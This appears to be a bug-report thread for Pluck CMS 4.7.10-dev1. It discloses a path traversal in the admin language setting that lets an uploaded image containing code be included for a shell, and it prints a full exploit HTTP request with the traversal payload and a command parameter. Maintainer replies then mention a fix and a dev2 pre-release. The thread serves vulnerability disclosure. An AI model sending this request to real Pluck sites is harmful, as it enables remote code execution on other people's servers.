admin.php:

language.php：

save_file():

"../../../images/wphp.jpg" Be written to \data\settings\langpref.php

Users can upload a picture file containing malicious code to getshell.

POST /pluck-4.7.10-dev1/admin.php?action=language HTTP/1.1
Host: 127.0.0.1:83
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:83/pluck-4.7.10-dev1/admin.php?action=language
Cookie: LQUKaS_admin_username=admin; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1570503836; PHPSESSID=a0bhen6shpeifgc20p0l23pmj1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 70

cont1=../../../images/php.jpg&save=%E5%82%A8%E5%AD%98&cmd=echo "2333";

I have created a quick fix for this issue.
mod_security will prevent this exploit because of the "Path Traversal Attack".

Could you verify the fix? I drafted a new pre-release.
pluck-4.7.10-dev2.tar.gz

Have you retested with the latest Dev version?